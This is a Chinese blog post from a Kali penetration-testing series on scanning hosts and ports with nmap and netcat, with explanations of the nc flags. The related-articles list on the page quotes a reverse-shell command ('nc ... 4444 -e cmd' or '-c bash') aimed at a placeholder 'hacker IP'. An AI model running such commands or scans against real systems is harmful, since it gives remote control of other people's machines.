kali渗透之利用nmap和nc进行扫描

已于 2022-02-21 11:49:19 修改
阅读量785 收藏 3
点赞数 1
分类专栏: kali渗透 文章标签: 安全 web安全 网络 渗透测试
于 2022-02-18 14:41:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56988395/article/details/123003018
版权

目录

基于Nmap的扫描方式

使用NC(netcat)扫描端口

作用

NC参数

基于Nmap的扫描方式

nmap -sn 192.168.60.0/24 (-sn 表示只进行PING扫描)

nmap扫描类型主要有tcp的全连接扫描(会在被扫描机器留下记录),半连接扫描(不会留下记录)

nmap -sS(半连接) 192.168.60.77 -p 80,81,21,25,22,110,443(端口)

使用NC(netcat)扫描端口

作用

1,实现TCP/UDP端口解析,nc可以作为server以TCP或UDP方式监听指定端口

2,端口的扫描,nc可以作为client发起TCP或UDP连接

3,机器之间传输文件

4,机器之间网络测速

NC参数

-nv 表示我们扫描的目标是个IP地址而不做域名解析

-w 表示超时时间

-z 表示进行扫描的端口

nc -nv -w 1 -z 192.168.60.7 1-100

翎~翊
关注
专栏目录
kali linux渗透常用工具—NETCAT[瑞士军刀NC]
qq_41850110的博客
02-16 1171
NETCAT被誉为网络安全界的‘瑞士军刀’,初识或从事网络安全的人都不会陌生。 这是一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。 它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。 同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 NC–NATCAT(跨平台远程连接工...
网络安全kali渗透学习 web渗透入门 如何进行基于Nmap扫描方式
xueshenlaila的博客
02-14 796
Nmap是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字Nmap是Network Mapper的简称。 nmap扫主要包括四个方面的扫描功能分别是主机发现(Host Discovery)、端口扫描(Port Scanning)、应用与版本侦测(Version Detection)、操作系统侦测(Operating System Detection)。这四项功能之间,又存在大致的依赖关系。 这篇文章教大家如何进行基于Nmap扫描
Kali Linux渗透测试 036 Nmap-扫描脚本
kevinhanser
03-10 2028
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Nmap 扫描脚本 smb-vuln-ms10-061.nse
Kali Linux进阶篇:Nmap扫描网络空间存活主机技巧
Kali与编程
09-05 4918
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali与编程,学习更多网络攻防干货! 一、背景介绍 nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。 正如大多数被用于网络安全的工具,nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap探测工作环境中未经批准使用的服务器,但是黑
Kali渗透-NMAP高级使用技巧和漏洞扫描发现
热门推荐
Shmily17s的博客
11-19 1万+
4.1 NMAP高级使用技巧 4.1.1 NMAP概述 nmap可用于 检测活在网络上的主机 检测主机上开放的端口 检测到相应的端口的软件和版本 检测操作系统,硬件地址,以及软件版本 检测脆弱性的漏洞(nmap脚本) 4.1.2 NMAP端口状态解析 4.1.3 NMAP的语法及示例 nmap 可以扫内网,也可以扫描外网 直接使用nmap nmap 192.168.1.63 nmap ...
Linux利用nc命令监控服务器端口的方法
11-12
最近碰到一个项目,前端用apache htttpd进行发布(80端口),通过双机负载均衡转发到后端的两个tomcat进行处理(8081和8082端口),现在需要随时监控这三个端口的情况,一旦down掉需要能够立即告警处理。批量的系统监控比较好的是用nagios软件来实现,这样小项目专门装一个nagios软件,有点繁琐了。在网上查了一些资料,总结实验了一下,可以用简单的nc命令来实现。
Kali渗透测试之端口扫描1——UDP、TCP、僵尸扫描、隐蔽扫描
浅浅的博客
04-20 2775
端口扫描 每个服务器上面都会跑很多应用,每个应用都会侦听某些端口,通过侦听端口接收来自客户端或其他用户对应用程序的访问。所以在发现目标主机存活后,我们需要知道目标主机上都开放了那些端口,应用程序的漏洞都是通过端口体现出来的。后续的渗透测试如果能攻击进入一个操作系统的话,都是通过端口后面的应用程序的漏洞攻击进去的。所以说,二三四层主机发现只是为了准确发现活着的IP,确定攻击面;端...
Kali Linux渗透测试之服务扫描(二)——SNMP、SMB、SMTP扫描
橘子女侠
04-16 6744
1. SNMP扫描 SNMP:简单网络管理协议 基于SNMP,进行网络设备监控,如:交换机、防火墙、服务器,CPU等其系统内部信息。基本都可以监控到。 community:登录证书,容易被管理员遗忘修改其特征字符 #可用字典破解community(public/private/manager); 信息的金矿,经常被错误配置; MIB Tree: SNMP Management In...
渗透测试 ( 5 ) --- 扫描之王 nmap渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 5734
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
Kali Linux渗透测试之端口扫描(一)——UDP、TCP、隐蔽端口扫描、全连接端口扫描
橘子女侠
04-14 6908
端口扫描 二、三、四层发现的目的就是发现存活的IP,在存活的IP上面,展开进一步的扫描,及端口扫描,发现存活主机上存在着哪些开放的端口,端口后面就对应着各种各样的应用程序,应用程序的漏洞都是通过端口体现出来的,所以,扫描端口为我们后续的攻击提供更大的攻击面。 端口对应网络服务及应用端程序; 服务端程序的漏洞通过端口攻入; 发现开放的端口; 更具体的攻击面; 1. UDP端口扫描 ...
Kali Linux 渗透测试之主动信息收集(三)——四层之主机发现(TCP、UDP、scapy、Nmap、Hping3)
weixin_45116657的博客
08-15 1501
发现——四层发现 四层发现简介: 四层发现虽然使用了端口的探测,但是并不对端口进行解析,只是利用了四层的通讯,通过端口识别目标主机是否存活; 最终目的是判断目标IP是否存活; 优点: 可路由且结果可靠(根据TCP/UDP探测端口,根据端口返回的结果,探测目标IP是否存活); 不太可能被防火墙过滤; 甚至可以发现所有端口都被过滤的主机; 缺点: 基于状态过滤的防火墙可能过滤扫描; ...
kali渗透攻击
最新发布
tanjing7584239的博客
04-10 1832
通过不断地尝试和实践,我逐渐掌握了这些工具的使用方法,并能够在模拟环境中成功进行渗透测试。在学习的过程中,我深刻体会到了网络安全的重要性。通过不断学习和实践,我逐渐掌握了渗透测试的基本技能和方法,并能够在实际工作中应用这些技能来发现和解决安全问题。我相信在未来的学习和工作中,我会继续努力提高自己的网络安全水平,为网络安全事业做出更大的贡献。因此,在进行渗透测试之前,必须获得授权和许可,并严格遵守相关的法律法规和道德规范。通过这段时间的学习和实践,我收获颇丰,也深刻体会到了渗透测试的重要性与复杂性。
网络管理工具nmapnc安装使用
weixin_43824520的博客
07-02 696
nmap即(Network Mapper),是linux系统中一个常用的网络管理工具,可以扫描端口、嗅探主机所在的网络环境,以及判断网络中主机的操作系统等。 实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 nmap yum install -y nmap #查看主机当前开放的端口 nmap localhost #查看主机端口(1024-65535)中开放的端口 nmap -p 1024-65535 localhost #探测目标主机开放的端口 .
网络扫描工具nc&nmap
Linuxer's Blog Data
07-22 6327
一、NC 1、nc安装 # yum install nc 2、nc详解 linux nc命令   功能说明:功能强大的网络工具 语  法:nc [-hlnruz][-g][-G][-i][-o][-p][-s][-v...][-w][主机名称][通信端口...] 参  数:   -g   设置路由器跃程通信网关,最丢哦可设置8个。   -G   设置来源路由指向器,其数
nmapnc扫描工具
diexingtao9618的博客
09-18 1127
nmapnc扫描工具 1 使用nmapnc探测服务器信息-使用curl 查看web服务器类型 2 在centos6系统下进行提权 3 实战-通过tcpdump抓包解决服务器被黑上不了网的问题 .1.1 安装nmap命令 1、nmap概述:nmap是一个网络探测安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息。...
网络安全kali渗透学习 web渗透入门 WireShark抓包及常用协议分析_kali wireshark抓包
Hacker_gangg的博客
03-01 1369
网络安全kali渗透学习 web渗透入门 WireShark抓包及常用协议分析_kali wireshark抓包
Nmap&NC食用技巧
wh00000001的博客
08-16 96
扫描例子:nmap -p- -A -sS 192.168.11.100。
nmap配合nc拿到cmd权限
qq_53947780的博客
07-31 244
第一步:在内网进行nmap扫描 nmap -sn [扫描内网网段] (直接跳过主机发现) 第二步:确定目标:nmap -sS 【目标IP】 第三步:黑客用nc.exe监听自己端口4444:nc -lp 4444 第四步:服务端主动连接黑客:nc -nv 【黑客IP】 4444 -e cmd (如果是linux为-c bash) 控制cmd后进行信息收集: whoami 查看自己身份 whoami /all 获取当前域的信息 ipconfig /all 查看详细ip...
一些常用linux网络工具的经验共享--Tcpdump,Nmap,Netstat,nc
浮白
03-07 5425
<br />Tcpdump-转储网络上的数据流<br /><br /> Tcpdump能够截获当前所有通过本机网卡的数据包。它拥有灵活的过滤机制,可以确保得到想要的数据。由于Tcpdump 只能收集通过本机的数据,因此它的应用受到了一些限制,大多应用在网关或服务器自我检测上。例如,在作为网关的主机上,想知道本地网络中IP 地址为192.168.0.5 的主机现在与外界通信的情况,就可以使用如下命令:<br /><br /> tcpdump -i eth0 src host 192.168.0.5<
Kali渗透测试NMAP扫描策略与服务探测详解
Kali渗透测试工具实战技巧合集涵盖了在进行渗透测试时必不可少的一系列技术,利用Nmap这一强大的网络探测工具,可以有效地评估网络安全性并获取目标系统的相关信息。以下是Nmap工具在不同阶段的使用策略: 1. 主机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

翎~翊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值